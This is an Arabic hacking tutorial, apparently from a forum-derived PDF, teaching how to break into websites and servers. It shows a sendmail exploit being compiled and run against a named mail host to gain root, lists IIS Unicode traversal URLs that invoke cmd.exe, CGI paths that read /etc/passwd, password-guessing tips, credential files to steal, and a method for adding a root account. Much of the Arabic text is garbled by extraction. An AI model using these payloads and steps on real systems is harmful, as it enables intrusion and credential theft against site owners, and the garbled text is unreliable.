‫ـ‪-:‬اﻟﺜﻐ ﺮا ت ﻫﻰ ﺿﻌ ﻒأﻣﻨﻰ ﯾﺴﺎﻋﺪكﻓﻰ د ﺧﻮ ل ﻧﻈﺎم ﻣﻌﯿﻦ وأ ﺧ‬ ‫ﺟ‬

‫ﺘ ﻀﻤﻦ‬ ‫ﺘﺼ ﺮ ف وﺗ‬‫ﺘﺨﺪماﻟﻰاﻟﻤﺪﯾ ﺮاﻟﻤ‬ ‫ﺘ ﺤﻮ ل ﻣﻦ ‪ user‬ﺎﻟﻰ ‪ administrator‬ﯾﻌﻨﻰ ﻣﻦ ﻣﺴ‬ ‫ﺘﻰﺗﺨﻠﯿﻚﺗ‬ ‫ﺎﻟ‬


‫ﻗﻊﺑﯿﻬﺎ‬ ‫ﺘﻨﺒﻪﺄ ﺻ ﺤﺎباﻟﻤﻮا‬ ‫ﺘﺜﻤﺎرﻫﺎ ﻋﻠﺸﺎن ﻻ ﯾ‬ ‫وﯾﺠﺐ ﻋﻠﻰاﻟﺪوام ﻣﻌ ﺮﻓﺔاﻟﺜﻐ ﺮا تاﻻﻣﻨﯿﻪاﻟﺠﺪﯾﺪة وأﺳ‬
‫ﺘﺸ ﻒﻓﻲاﻻﺑﺎﺗﺸﻰ وﻫﻮ ﺳﯿ ﺮﻓ ﺮ‬ ‫ﻗ ﺮب ﻣﺜﺎ لﻟﻬﺬهاﻟﺜﻐ ﺮا تاﻟ ﻀﻌ ﻒاﻷﻣﻨﻲاﻟﺬىأﻛ‬ ‫ﺘﻢﺗﻘﻔﻠﯿﻬﺎ ( ﻮأ‬ ‫ﻗﻌﻮﻫﺎ ) ﯾ‬
‫ﯾﺮ‬
‫ﺘﺒ ﺮﺛﻐ ﺮة وﻣﻦاﻟﻤﻤﻜﻦ‬ ‫ﻗﻊﺗﻌ‬ ‫ﯾ ﺮﻛﺐ ﻋﻠﻰ ﻧﻈﺎمﻟﯿﻮﻧﻜ ﺲ وأى ﺿﻌ ﻒﻓﻰأ ﺣﺪاﻟﺒ ﺮاﻣ ﺞأوﻗﺎﻋﺪهﺑﻨﺎ ءاﻟﻤﻮ‬
‫ﻗﻊ وﻣﺸﺎﻫﺪةاﻟﺒﺎﺳﻮردا ت‬ ‫ﺘ ﺤﻜﻢﻓﻲ ﺎﻟﻤﻮ‬ ‫ﻗﻪ واﻟ‬
‫ﺘ ﺮا‬
‫ﻗﻊاﻟﻤ ﺮادأ ﺧ‬
‫ﺘ ﺮا قاﻟﻤﻮ‬
‫ﺘﻔﺎده ﻣﻨﻬﺎﻓﻲأ ﺧ‬ ‫ﺘﺨﺪاﻣﻬﺎ واﻷﺳ‬ ‫اﺳ‬
‫وﻛ ﻞ ﻣﺎﺗ ﺮﯾﺪ ﻋﻦ ﻃ ﺮﯾﻘﻬﺎ‬

‫ﺘﻬﺎ ؟؟؟‬
‫ﺘﺜﻤ ﺮاﻟﺜﻐ ﺮهاذااﻧﺎﻟﻘﯿ‬
‫ﺲ‪ -:٢‬ﻃﯿﺐﻛﯿ ﻒاﻧﺎ ﺎﺳ‬
‫ﺘﻪ‬
‫ﺘﻮﺑﻪﺑﺎﻟﻐﻪ ‪ C‬ﻮاﻧ‬
‫ﺘﺎﺗﻬﺎ ﻣﻜ‬
‫ﺘﺸﻔﻮااﻟﺜﻐ ﺮا تﻛﺎﻧ ﺖ ﻧﺴﺒﺔ ‪ %٩٩‬ﻣﻦاﻟﺜﻐ ﺮا تﺗﻜﻮن ﺳﻜ ﺮﺑ‬ ‫ﻗ ﺖ ﻣﺎأﻛ‬
‫ـ‪ -:‬ﻣﻦ و‬‫ﺟ‬
‫ﺘﺎجﻟﻤﻌ ﺮﻓﺔ ﻫﺬهاﻟﻠﻐﻪﺄو ﻋﻠﯿﻚﺗ ﺤﻮﯾﻠﻬﺎ ‪.‬‬ ‫ﺗﺤ‬

‫ﺘﻔﺎده ﻣﻦ ﻫﺬهاﻟﺜﻐ ﺮهأوﺑﻤﻌﻨﻰ‬


‫ﺘﻤﻜﻦ ﻣﻦاﻷﺳ‬ ‫ﺘﻪﺗ‬‫ﺘﻰاﻧ‬ ‫ﺘﺎجاﻟﻰ ‪ shell‬ﺣ‬ ‫ﻛﻤﺎأن ﻫﻨﺎكاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺜﻐ ﺮا ت ﯾ ﺤ‬
‫ﺘﺎجاﻟﻰ ‪ Shell PHP‬ﻮﻣﻦ ﻫﺬه‬ ‫أ ﺧ ﺮاﻟ ﻀﻌ ﻒ ﻮﻋﻠﻰ ﺳﺒﯿ ﻞ ﺎﻟﻤﺜﺎ لﺑﻌ ﺾاﻟﺜﻐ ﺮا تاﻟﻤﻮﺟﻮدهﻓﻰ ‪PHP‬ﺗ ﺤ‬
‫ﺎﻟﻜﻼم‪.‬‬
‫ﻮﻋﻠﻰﻓﻜ ﺮةاﻟ ﻀﻌ ﻒ ﯾﻜﻮنﻓﻲاﻻﺻﺪارا تاﻟﺨﺎ ﺻﺔ‬
‫ﻮﻛﻤﺎنﻓﻲﺛﻐ ﺮه ﻣﻦ ﻧﻮ ع ‪ Kernel 2.2.x‬ﻮﻟﻜﻦﻫﺬهاﻟﻤ ﺮةﻓﻲ ﻧﻈﺎمﺗﺸﻐﯿ ﻞﻟﯿﻮﻧﻜ ﺲ‬

‫ﺘﺎ ت‬
‫ﻗﻊ ( وﻫﻨﺎكﺄﯾ ﻀﺎ ﺳﯿﻜ ﺮﺑ‬
‫ﺘﺎ تﺗﻮﺟﻮدهﻓﻰاﻟﻤﻮ‬ ‫ﺘﻰﺗﻜﻮنﺑﺎﻟﻠﻐﺔ ‪C‬ﺗﻜﻮن ﺳﯿﻜ ﺮﺑ‬ ‫)ﻣﻼ ﺣﻈﻪ ﻫﺬهاﻟﺜﻐ ﺮا تاﻟ‬
‫ﺘﻪ ﻣ ﺮﻛﺐﻟﻮﯾﻨﻜ ﺲ ﻋﻠﺸﺎناﻻواﻣ ﺮ وأﻧﺎأﻧﺼ ﺤﻚ‬ ‫ﺘﻮﺑﺔﺑﺎﻟﻠﻐﻪ ‪ perl‬ﻮﻻزمﻓﻰﻫﺬهاﻟ ﺤﺎﻟﺔﺗﻜﻮناﻧ‬ ‫أ ﺧ ﺮى ﻣﻜ‬
‫ﺗ ﺮﻛﺐ‪linux Redhat 7.3‬‬
‫ﺘﻪأرﻛﺐاﻟﻤﺎﻧﺪرﯾﻚ وﻻاﻟ ﺮﯾﺪﻫﺎ تﻗﺎ لﻟﻰاﻧﻪ‬ ‫ﺘ ﺮﻟﻤﻦاﻧﺎ ﺳﺄﻟ‬ ‫ﻷﻧﻪأﻓ ﻀ ﻞ ﻣﻦاﻟﻤﺎﻧﺪرﯾﻚ وأذﻛ ﺮاﻧﻪاﻷ خﺑﻼكﻫﺎﻧ‬
‫اﻟﻤﺎﻧﺪرﯾﻚ ﺻﻮرة ﻣﺒﺴﻄﻪ‬
‫ﻗﻮى وﺟﺰاةا ﷲ ﺧﯿ ﺮ ﻋﻠﻰ ﻫﺬهاﻟﻨﺼﯿ ﺤﺔ ﻧ ﺮﺟﻊﻟﻠﻤﻮ ﺿﻮ ع‬ ‫ﺘﻄﻮر ﻮأﻧﻪاﻟ ﺮﯾﺪﻫﺎ تأ‬‫ﻟﻠ ﺮﯾﺪﻫﺎ تﺑ ﺲ ﻏﯿ ﺮﻗﺎﺑﻠﻪﻟﻠ‬

‫ﺲ‪-:٣‬ﻛﯿ ﻒأ ﺣﻮ لﻟﻐﻪاﻟﺒﯿ ﺮ ل ؟؟‬


‫ﺘﻪ ﺳﻮىﻫﺬهاﻷﻣ ﺮ‬
‫ـ‪-:‬اﻟﻄ ﺮﯾﻘﺔ ﻣ ﺮه ﺳﻬﻠﻪﻛﻠﻬﺎاواﻣ ﺮ ﻋﺎدﯾﺔﻓﻲاﻟﺒﺪاﯾﺔ ﺎﻧ‬ ‫ﺟ‬

‫‪./file.pl‬‬
‫ﺗﻌﻄﯿﻚﻫﺬهاﻟ ﺮﺳﺎﻟﺔ‬
‫‪Access Denied----‬ﻫﺬهاﻟ ﺮﺳﺎﻟﺔﺗﻮ ﺿﺢ ﻋﺪماﻟﻤﻮاﻓﻘﻪ‬
‫ﺘﻪاﻻﻣ ﺮ ﻫﺬه‬
‫ﺘﺎﺑ‬
‫ﺄذا ﺻﺎرﻟﻚﻛﺬاﻛ ﻞ ﻣﺎ ﻋﻠﯿﻚ ﺳﻮىﻛ‬

‫ﺘﺐأﺳﻢ ﺎﻟﻤﻠ ﻒ‬
‫ﺘﻪﺗﻜ‬
‫‪chmod +x Conik.pl-----‬ﻻ ﺣﻆ ﻣﻜﺎنﻛﻮﻧﯿﻚاﻧ‬

‫‪١ ٧٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺠﯿﻪ را حﺗﻜﻮن زىﻛﺬا‬


‫ﻮﺷﻐﻠﺔ ﻣ ﺮهﺛﺎﻧﯿﺔ وﺷﻮ فاﻟﻨ‬
‫‪$ ./Conik.pl‬‬

‫ﺲ‪ -:٤‬ﻃﯿﺐﺑﺎﻟﻨﺴﺒﺔﻟﻠﻐﺔ‪ C‬؟‬


‫ﺘﻪﺗﺨﻠﻰاﻟﻤﻠ ﻒ ﯾﻜﻮن ﻣﻠ ﻒﺗﻨﻔﯿﺬىﺑﻬﺬهاﻻﻣ ﺮ‬
‫ـ‪ -:‬ﻋﻠﺸﺎنﺗ ﺤﻮﯾ ﻞاﻟﻤﻠ ﻒ ﻻزم ﺎﻧ‬
‫ﺟ‬

‫ﺘﺐأﺳﻢاﻟﻤﻠ ﻒﺑﺪا لأﺳﻤﻰﻛﻮﻧﯿﻚاﻟﻤ ﺮادﺗﻐﯿ ﺮة‬


‫ﺘﻪﺗﻜ‬
‫>‪gcc -o Conik Conik.c ------‬ﻻ ﺣﻆاﻧﻪاﻧ‬

‫ﯾﻌﻨﻰ ﻋﻠﻰ ﺳﺒﯿ ﻞاﻟﻤﺜﺎ ل ‪-:‬‬

‫‪gcc -o Conik conik.c‬‬

‫ﻮرا ح ﯾﻜﻮناﻟﻤﻠ ﻒ ﺟﺎﻫﺰﺑﻌﺪ ﻫﺬهاﻻﻣ ﺮ‬

‫‪./Conik.c‬‬

‫ﻮﺑﻌﺪ ﻣﺎﺻﺎراﻟﻤﻠ ﻒ ﺟﺎﻫﺰ‬


‫‪$ gcc -o sendmail sendmail.c‬‬
‫‪$ ./sendemail‬‬

‫>‪Usage : sendmail <host> <OS> <user> <password‬‬


‫>‪$ ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous -----‬‬
‫ﻗﻊاﻟﻰﺗﺒﻐﺎه ﻣﻜﺎن‪israel‬‬
‫ﺘﺐ ﻫﻨﺎ ﺎﻟﻤﻮ‬‫ﺘﻪﺗﻜ‬
‫ﻻ ﺣﻆاﻧﻚاﻧ‬
‫‪connecting to host...‬‬
‫‪connected...‬‬
‫‪id‬‬
‫)‪uid=0(root) gid=0(root‬‬

‫ﺘﺸﻐﯿ ﻞ واﻟﯿﻮزر واﻟﺒﺎﺳﻮرد‬‫ﻻ ﺣﻆاﻧﻪ ﻃﻠﺐ ﻣﻤﻨﺎاﻟﻤﻠﻘﻢﻟﻠﺒ ﺮﻧﺎﻣ ﺞ ‪ Sendemail‬ﻮﻛﻤﺎن ﻃﻠﺐ ﻧﻈﺎماﻟ‬
‫ـ‪Exan nofer‬‬ ‫ﺘﻨﻔﯿﺬ ﺎﻟ‬
‫ﺘﯿﺎز ‪Root‬ﺑﺴﺒﺐﻗﯿﺎماﻟﺒ ﺮﻧﺎﻣ ﺞﺑ‬
‫ﻮﺑﻌﺪ ﻫﺬهﻛﻠﻪاﻟﺒ ﺮﻧﺎﻣ ﺞأﻋﻄﺎﻧﺎأﻣ‬
‫ﻣﻼ ﺣﻈﺔ ﻻﺗ ﻀﻦأﻧﻪﻟﻤﻦاﻧﺎ ﺣﻄﯿ ﺖاﻟﺒ ﺮﻧﺎﻣ ﺞ ‪XXX. SENDMAIL‬ﺑﺪون ﺎى ﺳﺒﺐأﻧﺎ ﺣﻄﯿ ﺖﻟﻚ ﻫﺬه‬
‫اﻟﻤﺜﺎ ل ﻵﻧﻪ ﻫﻨﺎكﺛﻐ ﺮهﻓﻰ ﻫﺬهاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻮرا حأﺷ ﺮ ﺣﻬﺎﻟﻚأن ﺷﺎ ءا ﷲﺗﻌﺎﻟﻰﺑ ﺲﻛﺎنﺑﺪىﺗ ﺤﻔﻆاﻷﺳﻢ ﻫﺬه‬

‫ﺎﻟﻈﺎﻫ ﺮاﻧﻪ ﻧ ﺤﻨﺎﺄﺗﻮﻏﻠﻨﺎﻓﻰاﻟﻤﻮ ﺿﻮ ع زاﯾﺪة ﻋﻦاﻟﻠﺰوم‬

‫س‪ -:٥‬ﯾﺎا ﷲﻛ ﻞﻫﺬه ﻋﻠﺸﺎنﺛﻐ ﺮهﺑ ﺲﺑﻄﻠ ﺖﺄﻧﺎ ﻣﺎأﺑﻐﺎاﺗﻌﻠﻢ ؟‬


‫ـ‪-:‬ﻟﻮوووو ل ﺣﺒﯿﺐاﻟﺒﻰ ﻫﺬهاﻟﻄ ﺮﯾﻘﺔاﻟﻤﻌﻘﺪه ﺷﻮﯾﺔﻟﻠﺜﻐ ﺮا تﻓﻲﺛﻐ ﺮا تﺛﺎﻧﯿﺔ ﺣﻠﻮة وﺳﻬﻠﻪ ﺟﺪا ﺟﺪا‬
‫ﺟ‬

‫ﺲ‪-:٦‬أﯾ ﺶﻫﻲﻗﻮ ل ﯾﺎ ‪Conik‬ﺗ ﺮى ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ ﯾﺒﻐﺎﻟﻬﺎ ﻧﻈﺎمﺗﺸﻐﯿ ﻞ وﻛﻤﺎنﻟﻐﻪ ‪ C‬ﻮ‪ Perl‬؟‬
‫ﺘﺼﻔﺢ وﺗﻮﺻ ﻞاﻟﻰ‬‫ﻗﻊ ﻋﺒ ﺮاﻟﻤ‬
‫ﺘﻪﺗﺸﻮ ف ﻣﻌﻠﻮﻣﺎ تاﻟﻤﻮ‬ ‫ﺘﺼﻔﺢ ﯾﻌﻨﻰاﻧ‬ ‫ﺘﺨﺪم ﻣﻦ ﺧﻼ لاﻟﻤ‬ ‫ـ‪-:‬ﻓﻲﺗﻐ ﺮا تﺗﺴ‬ ‫ﺟ‬
‫ﻣﻠ ﻒاﻟﺒﺎﺳﻮردا ت ﻣﻦ ﻫﺬهاﻟﻄ ﺮﯾﻘﻪ‬

‫‪١ ٧٥‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

PHP - CGI - UNICODE - VB - etc‫ﻮﻣﺜﺎ ل ﻋﻠﻰ ﻫﺬهاﻟﺜﻐ ﺮا ت‬

‫ﺄﻧﺎ ﺳﻤﻌ ﺖ ﻋﻨﻬﺎﻛﺜﯿ ﺮ ﻧﻔﺴﻰاﺷﻮ فﻛﯿ ﻒ ﺷﻜﻠﻬﺎ وأﻋ ﺮ ف ﻮﯾ ﺶ ﻫﻰ ؟؟؟‬UNICODE ‫اوووووة‬-:٧‫ﺲ‬


‫ﺘ ﺮا ق‬
‫ ﻣﻤﺎﺗﺴﺎﻋﺪﻓﻲأ ﺧ‬Microsoft ‫ﻓﻲ‬IIS ‫ﻫﻰ ﻋﺒﺎرة ﻋﻦ ﺿﻌ ﻒﻓﻲ ﻧﻈﺎم‬UNICODE ‫ ﺣﺒﯿﺒﻰ‬-:‫ـ‬ ‫ﺟ‬
‫ﺘ ﺮا قﺑﻬﺬهاﻟﻄ ﺮ ق ﺳﻬ ﻞ ﺟﺪا‬
‫ﻗﻊﺑﻜ ﻞ ﺳﻬﻮﻟﻪ ﻋﻤﻮﻣﺎاﻻ ﺧ‬
‫اﻟﻤﻮ‬

UONICODE :-‫ﺘﻰﺗﻢ ذﻛ ﺮﻫﺎ ﻣﻦﻗﺒ ﻞ وﺳﻮ فأ ﺿﻊأﻣﺜﻠﻪ ﻋﻠﻰﺛﻐ ﺮا ت‬


‫ﻣﻘﺎرﻧﺔﺑﺎﻟﻄ ﺮ قاﻟﺴﺎﺑﻘﺔاﻟ‬

/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%
35%63../winnt/system32/cmd.exe?/c+dir+c:\

/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe
?/c+dir+c:\

/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32
/cmd.exe?/c+dir+c:\

/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste
m32/cmd.exe?/c+dir+c:\

/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+di
r+c:\

/cgi-
bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd
.exe?/c+dir+c:\

UONICODE‫ﺘﻄﺎ عاﻧﻰأﺷﻜ ﻞﻓﻰأﻧﻮا ع‬


‫ﺣﺎوﻟ ﺖﻗﺪاﻟﻤﺴ‬

‫ﻫﺬه ﻣﺜﺎ ل ﻋﻠﯿﻬﺎ‬CGI ‫ـ‬


‫ﺄﻣﺎﺑﺎﻟﻨﺴﺒﺔاﻟﻰﺛﻐ ﺮا تاﻟ‬

/cgi-bin/view-source?../../../../../../../etc/passwd

/cgi-bin/phf

/cgi-bin/wwwboard.pl

/cgi-bin/AT-admin.cgi

١ ٧٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

/cgi-bin/info2www

/cgi-bin/environ.cgi

‫ﻗﺴﻢاﻟﺜﻐ ﺮا تﻟﻚﺑ ﺤﺴﺐ ﻧﻈﺎم‬


‫ﺘﺼ ﺮاﻷﻣ ﺮ ﻋﻠﻰ ﻫﺬهاﻟﺜﻐ ﺮا ت ورا حأ‬
‫ﻗﻰاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺜﻐ ﺮا ت ﯾﻌﻨﻰ ﻻ ﯾﻘ‬
‫ﻫﺬه ﻮﺑﺎ‬
‫ﺘﺸﻐﯿ ﻞ‬‫اﻟ‬

NT : Uni code , bofferoverfollow , tftp

Liunx : Get Access , CGI , buffer overfollow , PHP , send mail ,


ProFTPD, WU-FTPD, Kernel Exploits, rootkits,

UNIX : Get Access , CGI , buffer overfollow , PHP , send mail , Kernel
...exploits, rootkits, ProFTPD, WU-FTPD,

١ ٧٧
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" اﺳﺘﻐﻼل ﻟﯿﻨﻜﺲ ﰲ اﺧﱰاق اﳌﻮاﻗﻊ "‬

‫‪$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪Viagra 2001:‬‬
‫‪$$$$$$$$$$$$$$‬‬

‫ﻗﻊ ﻮﻟﯿ ﺲﻟﺪﯾﻪ ﺎﻟﺨﺒ ﺮة ﺎﻟﻜﺎﻓﯿﺔﻓﯿﻪ ‪...‬‬


‫ﺘ ﺮا ق ﺎﻟﻤﻮا‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊﻟﯿﻨﻜ ﺲﻓﻲ ﺎ ﺧ‬ ‫ﻫﺬا ﺎﻟﻤﻮ ﺿﻮ ع ﻣﺨﺼ ﺺﻟﻤﻦﺄراد ﺎﻟ‬
‫ﺘ ﺤﺴﻦ ﺎﻟﻘﯿﺎمﺑﻬﺎﺑﻌﺪ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰﻛﻠﻤﺔ ﺎﻟﺴ ﺮ ﻮاﻟﻨﺠﺎ حﻓﻲ‬ ‫ﺘﻲ ﯾﺴ‬‫ﺳﻮ ف ﯾﻜﻮنﻫﺬا ﺎﻟﻤﻮ ﺿﻮ ع ﻋﻦ ﺎﻟﻌﻤﻠﯿﺎ ت ﺎﻟ‬
‫ﺎﻟﺪ ﺧﻮ ل ﻋﻠﻰ ﺎﻟﻨﻈﺎم ‪..‬‬
‫ﺘﺨﺪامﺑﻌ ﺾ ﺎﻟﻜﻠﻤﺎ ت ﺎﻟﻤﺸﻬﻮرة ﻮﺗﻮﺟﺪﺑﻌ ﺾ‬ ‫ﺄوﻻ ﯾﺠﺐ ﺎنﺗﻌ ﺮ فﺑﺄﻧﻪ ﯾﻤﻜﻦ ﺎنﺗﺪ ﺧ ﻞ ﻋﻠﻰﺑﻌ ﺾ ﺎﻻﻧﻈﻤﺔﺑﺎﺳ‬
‫ﺘﻨﻔﯿﺬﺄﻣ ﺮ ﻮا ﺣﺪﺛﻢﺗﻘﻮمﺑﺎ ﺧ ﺮاﺟﻚ ﻣﻦ ﺎﻟﻨﻈﺎمﺑﻌﺪﺬﻟﻚ ﻮأﻓ ﻀ ﻞﺗﻠﻚ ﺎﻷواﻣ ﺮﻫﻲ ‪:.‬‬ ‫ﺎﻻﻧﻈﻤﺔﺗﺴﻤﺢﻟﻚﺑ‬

‫‪who‬‬
‫‪rwho‬‬
‫‪finger‬‬
‫ﺘﺨ ﺮجﻛﻠﻤﺔ ﺎﻟﺴ ﺮ ﻣﻦ‬‫ﺘﺨﺪﻣﯿﻦﻟﻠﻨﻈﺎم ﻮﺑﺬﻟﻚ ﯾﻤﻜﻦ ﺎنﺗﺴ‬ ‫ﺘﻌ ﺮ ض ﺎﺳﻤﺎ ء ﺎﻟﻤﺴ‬
‫ﺘﻔﯿﺪ ﻣﻦﻫﺬه ﺎﻷواﻣ ﺮﺑﺄﻧﻚﺗﺴ‬
‫ﻮﺗﺴ‬
‫ﺘﻌﻤ ﻞﻛﻠﻤﺔ ﺳ ﺮ ﻣﺸﺎﺑﻬﺔﺗﻘ ﺮﯾﺒﺎﻷﺳﻤﻪ ﻣﺜ ﻞ ‪:.‬‬‫ﺘﺨﺪﻣﯿﻦ ﯾﺴ‬‫ﻧﻔ ﺲ ﺎﻻﺳﻢ ﻮذﻟﻚﻷنﺑﻌ ﺾ ﺎﻟﻤﺴ‬
‫‪username : Black‬‬
‫‪password : Black2‬‬

‫ﺘﺎﺑﺔ ‪test‬ﺄو ‪demo‬‬


‫ﺘﻄﯿﻊ ﺎﻟﺪ ﺧﻮ لﺑﻜ‬
‫ﻮﻓﻲﺑﻌ ﺾ ﺎﻷﻧﻈﻤﺔﺗﺴ‬

‫ﺘﺨ ﺮاﺟﻬﺎﺑﻌﺪ ﺪ ﺧﻮﻟﻚ ﻋﻠﻰﺄي ﻧﻈﺎم ‪:.‬‬


‫ﺘﻲ ﯾﺠﺐ ﻋﻠﯿﻚ ﺎﺳ‬ ‫ﻣﻦ ﺎﻟﻤﻠﻔﺎ ت ﺎﻟﻤﻬﻤﺔ ﻮاﻟ‬
‫‪/etc/passwd‬‬
‫‪/etc/group‬‬
‫‪/etc/hosts‬‬
‫‪/usr/adm/sulog‬‬
‫‪/usr/adm/loginlog‬‬
‫‪/usr/adm/errlog‬‬
‫‪/usr/adm/culog‬‬
‫‪/usr/mail‬‬
‫‪/usr/lib/cron/crontabs‬‬
‫‪/etc/shadow‬‬

‫ﺎﻟ ﺤﺴﺎب ‪bin :.‬‬


‫ﻗﺪ ﯾﻮﺟﺪ ﻣﻠ ﻒﻛﻠﻤﺔ ﺎﻟﺴ ﺮ‬
‫ﺘﺨﺪم ﻮﯾﻮﺟﺪﺑﻪ ﻣﻌﻈﻢ ﺎﻟﻤﻠﻔﺎ ت ﺎﻟﻤﻬﻤﺔ ﻮ‬‫ﺘﻮي ﻋﻠﻰ ﺣﺴﺎب ﺎﻟﻤﺴ‬ ‫ﻮﻫﻮ ﻣﻬﻢ ﺣﯿﺚ ﯾ ﺤ‬
‫ﻮاذاﻛﺎنﻛﺬﻟﻚﻓﯿﻤﻜﻦ‬
‫(ﺄ ﺣﯿﺎﻧﺎ )ﺎ ﺿﺎﻓﺔﻛﻠﻤﺔ ﺳ ﺮ ﺧﺎﺻﺔﺑﻚ ﻮﺗ ﻀﯿ ﻒ ﺣﺴﺎب ﺪ ﺧﻮ ل( ﺮو ت )ﻟﻚ !!‬
‫ﺘﺎﻟﻲ ‪:.‬‬
‫ﻮاﻟﻄ ﺮﯾﻘﺔﺑﺴﻬﻮﻟﺔﻛﺎﻟ‬
‫‪ed passwd $‬‬

‫ﺘﺐﺄي ﺎﺳﻢ ﻮﺑﺬﻟﻚﺗﻜﻮن ﺎﻧ ﺖ ﻣﺪﯾ ﺮ ﺎﻟﻨﻈﺎم !!‬


‫ﻮأ ﺧﯿ ﺮاﺗﻘﻮ ل ‪ exec login‬ﻮﺗﻜ‬

‫‪١ ٧٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺨﺪم ؟ !!‬‫ﻣﺎ ﺎﻟﺬي ﺳﻮ فﺗﻮاﺟﻬﻪ ﻋﻨﺪ ﺪ ﺧﻮﻟﻚ ﻋﻠﻰﺄي ﻧﻈﺎمﺑﻜﻠﻤﺔ ﺳ ﺮ ﻮاﺳﻢ ﻣﺴ‬
‫ﺘﻤﺎﻻ ت ‪:.‬‬
‫ﺘﻘﺎﺑ ﻞ ﺎ ﺣﺪى ﻫﺬه ﺎﻻ ﺣ‬‫ﻋﻨﺪ ﺪ ﺧﻮﻟﻚ ﺎﻟﻰ ﺎﻟﻨﻈﺎم ﺳ‬
‫ﺘﺨﺪمﺂ ﺧ ﺮ ‪..‬‬
‫ﺘﻄﻌ ﺖ ﺎﻟ ﺤﺼﻮ ل ﻋﻠﻰ ﺣﺴﺎب ﻣﺪﯾ ﺮ ﺎﻟﻨﻈﺎم( ﺎﻟ ﺮو ت )ﺄو ﺎﻧﻚ ﺣﺼﻠ ﺖ ﻋﻠﻰ ﺣﺴﺎب ﻣﺴ‬ ‫ﺎﻣﺎ ﺎﻧﻚ ﺎﺳ‬
‫ﺘﺎﻟﻲ ‪:.‬‬ ‫ﺘﺐ ﺎﻻﻣ ﺮ ﺎﻟ‬ ‫ﻓﻲ ﺎﻟﺒﺪاﯾﺔﺗﻜ‬
‫‪pwd $‬‬
‫ﺘﯿﺠﺔﺗﻈﻬ ﺮ ‪:.‬‬ ‫ﻮاﻟﻨ‬
‫‪usr/admin/ $‬‬
‫ﺘﻌﺎﻣ ﻞ ﻣﻊﻛﺎﻣ ﻞ ﺎﻟﻨﻈﺎمﺑﺪونﻗﯿﻮد ‪..‬‬
‫ﺘﻄﯿﻊ ﺎﻟ‬
‫ﺘﻄﻌ ﺖ ﺎﻟﺪ ﺧﻮ ل ﻋﻠﻰ ﺎﻟﻤﺪﯾ ﺮ ﻮﺑﺬﻟﻚﺗﺴ‬ ‫ﺘﯿﺠﺔ ﺎﻇﻬ ﺮ ت ﺎﻧﻚ ﺎﺳ‬ ‫ﺎﻟﻨ‬
‫ﺘﯿﺠﺔ ‪..‬ﻓﻤﺜﻼ ‪:‬‬ ‫ﺘﯿﺠﺔ ﻏﯿ ﺮﺗﻠﻚ ﺎﻟﻨ‬ ‫ﺎذا ﻇﻬ ﺮ ت ﻧ‬
‫‪usr/Black/ $‬‬
‫ﺘﺨﺪم !!‬‫ﻓﻬﺬا ﯾﺪ ل ﻋﻠﻰ ﺎﻧﻚ ﺪ ﺧﻠ ﺖ ﻋﻠﻰ ﺣﺴﺎب ﻫﺬا ﺎﻟﻤﺴ‬
‫ﺘﺐ ﺎﻵﺗﻲ ‪:.‬‬ ‫ﺘﺨﺪمﺗﻜ‬ ‫ﻮﻟﻌ ﺮ ض ﻣﻠﻔﺎ ت ﻫﺬا ﺎﻟﻤﺴ‬
‫‪ls /usr/Black $‬‬
‫ﺘﺨﺪم ‪:.‬‬‫ﻮﺳﻮ ف ﯾﻌ ﺮ ضﻟﻚ ﻣﻠﻔﺎ ت ﻫﺬا ﺎﻟﻤﺴ‬
‫‪mail‬‬
‫‪pers‬‬
‫‪games‬‬
‫‪bin‬‬
‫ﻮﻟﻜﻦ ﻫﺬاﻟﻦ ﯾﻌ ﺮ ض ﻣﻠ ﻒ ‪.profile‬‬
‫ﺘﺐ ﺎﻵﺗﻲ ‪:.‬‬ ‫ﺘﻌ ﺮ ﺿﻪﺗﻜ‬ ‫ﻮﻟﻜﻲﺗﺴ‬
‫‪cd $‬‬
‫‪ls -a $‬‬
‫‪:‬‬
‫‪:‬‬
‫‪.profile‬‬
‫‪$‬‬

‫ﺘﺎﻟﻲ ‪:.‬‬
‫ﺘﺐ ﺎﻷﻣ ﺮ ﺎﻟ‬
‫ﺘﻮﯾﺎ ت ﻣﻠ ﻒﻓﺴﻮ فﺗﻜ‬ ‫ﺎذا ﺎرد تﻗ ﺮا ءة ﻣ ﺤ‬
‫‪cat letter $‬‬
‫ﺘ ﺮ ﺿﻨﺎ ﺎن ﺎﻟﻤﻠ ﻒ ﺎﻟﻤﻄﻠﻮب ﻫﻮ ‪letter‬‬ ‫ﻮﻫﺬا ﺎذا ﺎﻓ‬

‫ﺘﺐ ‪:.‬‬‫ﺎذا ﺎرد تﺗﻐﯿﯿ ﺮﻛﻠﻤﺔ ﺎﻟﺴ ﺮﻓﻤﺎ ﻋﻠﯿﻚ ﺎﻻ ﺎنﺗﻜ‬


‫‪passwd $‬‬
